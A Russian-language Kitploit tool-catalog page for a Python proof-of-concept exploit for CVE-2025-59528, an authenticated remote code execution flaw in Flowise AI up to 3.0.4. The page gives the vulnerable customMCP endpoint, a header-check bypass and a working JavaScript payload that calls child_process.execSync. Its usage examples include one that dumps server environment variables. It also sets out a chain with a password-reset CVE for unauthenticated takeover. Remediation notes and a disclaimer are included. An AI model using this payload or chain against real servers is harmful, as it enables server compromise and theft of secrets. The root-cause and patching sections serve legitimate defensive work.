Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Flowise-RCE-CVE-2025-59528 — Python PoC-эксплойт для CVE-2025-59528, обеспечивающий аутентифицированный RCE на Flowise AI <= 3.0.4 через эндпоинт customMCP и Node.js child_process.execSync. | Kitploit
Инструменты/GitHubGitHub/arensballiu/flowise-rce-cve-2025-59528
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubarensballiu/flowise-rce-cve-2025-59528

Flowise-RCE-CVE-2025-59528

Python PoC-эксплойт для CVE-2025-59528, обеспечивающий аутентифицированный RCE на Flowise AI <= 3.0.4 через эндпоинт customMCP и Node.js child_process.execSync.

Репозиторий
114 ч 37 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-59528 — Аутентифицированное удалённое выполнение кода (RCE) в Flowise AI

Обзор

CVE ID: CVE-2025-59528
Затронутое ПО: Flowise AI
Уязвимые версии: <= 3.0.4
Исправленная версия: 3.0.5 и более поздние
Критичность: Критическая
Автор: arensballiu
Дата: 2025

Описание

Flowise AI версий до 3.0.4 включительно позволяют аутентифицированному пользователю добиться удалённого выполнения кода (RCE) на хост-сервере путём отправки специально сформированной полезной нагрузки JavaScript на эндпоинт /api/v1/node-load-method/customMCP.

Метод загрузки узла customMCP принимает контролируемый пользователем ввод, который вычисляется на стороне сервера как JavaScript без должной санитизации или изоляции. Внедрив полезную нагрузку, использующую child_process.execSync из Node.js, злоумышленник может выполнить произвольные команды операционной системы с привилегиями процесса сервера Flowise.

Эндпоинт также требует наличия заголовка .

x-request-from: internal

Уязвимый эндпоинт

ЭндпоинтМетодТребуется аутентификацияНазначение
/api/v1/auth/loginPOSTНетАутентификация и получение сессии
/api/v1/node-load-method/customMCPPOSTДа (cookie сессии)Уязвимый эндпоинт метода загрузки узла

Proof of Concept

Файл: CVE-2025-59528_POC.py

Требования

  • Python 3.x
  • Библиотека requests
  • Действительные учётные данные любой учётной записи на целевом экземпляре Flowise
root@kitploit:~
pip install requests

Использование

root@kitploit:~
python3 CVE-2025-59528_POC.py -e <email> -i <target_url> -p <password> -c <command>

Аргументы

ФлагПолная формаОбязательныйОписание
-e--emailДаАдрес электронной почты аутентифицированного пользователя
-i--urlДаБазовый URL экземпляра Flowise
-p--passwordДаПароль аутентифицированного пользователя
-c--cmdДаКоманда ОС для выполнения на сервере

Примеры

Проверка выполнения кода:

root@kitploit:~
python3 CVE-2025-59528_POC.py -e [email protected] -i https://flowise.example.com -p MyP@ss -c "id"

Получение переменных окружения сервера:

root@kitploit:~
python3 CVE-2025-59528_POC.py -e [email protected] -i https://flowise.example.com -p MyP@ss -c "env"

Ожидаемый вывод

root@kitploit:~
[+] Logged in
[+] Exploit sent
[+] Status: 200

Разбор полезной нагрузки

Эксплойт внедряет следующее выражение JavaScript в поле mcpServerConfig:

root@kitploit:~
({x:(function(){
    const cp = process.mainModule.require('child_process');
    cp.execSync('<command>');
    return 1;
})()})
  • process.mainModule.require('child_process') — загружает встроенный модуль выполнения процессов Node.js.
  • execSync('<command>') — синхронно выполняет команду ОС, предоставленную злоумышленником.
  • Всё выражение обёрнуто в литерал объекта, чтобы гарантировать его корректное вычисление в контексте JavaScript сервера.

Заголовок x-request-from: internal также добавляется к запросу, чтобы пройти проверку внутреннего источника, которая иначе заблокировала бы вызов.

Первопричина

Эндпоинт customMCP передаёт предоставленный пользователем ввод напрямую в контекст вычисления JavaScript на сервере без санитизации или изоляции. В сочетании с неограниченным доступом к основным модулям Node.js (в частности, child_process) через process.mainModule.require это создаёт тривиально эксплуатируемый вектор RCE. Проверка заголовка x-request-from не обеспечивает значимой границы безопасности, поскольку он не проверяется ни с каким доверенным источником.

Цепочка с CVE-2025-58434

Эти две уязвимости можно объединить в цепочку для пути атаки с неаутентифицированным RCE против экземпляров Flowise версий <= 3.0.4:

  1. Используйте CVE-2025-58434, чтобы сбросить пароль любой известной учётной записи (предварительная аутентификация не требуется).
  2. Войдите с новыми установленными учётными данными.
  3. Используйте CVE-2025-59528 для выполнения произвольных команд ОС на сервере.

Устранение

  • Обновитесь до Flowise AI 3.0.5 или более поздней версии, которая удаляет или должным образом изолирует уязвимый путь вычисления.
  • Никогда не вычисляйте контролируемые пользователем строки как код в серверном контексте.
  • Ограничьте доступ к опасным модулям Node.js (child_process, fs и т. д.) с помощью надлежащей песочницы (например, vm2, изолированные контексты или удаление доступа к process.mainModule).
  • Проверяйте и аутентифицируйте заголовок x-request-from через серверный механизм, а не простую проверку строки.
  • Применяйте принцип наименьших привилегий к процессу сервера Flowise.

Отказ от ответственности

Данный proof of concept предоставлен исключительно в образовательных целях и для авторизованных исследований в области безопасности. Использование этого скрипта против систем без явного письменного разрешения является незаконным и неэтичным. Автор и участники не несут ответственности за неправомерное использование.

Скачать инструмент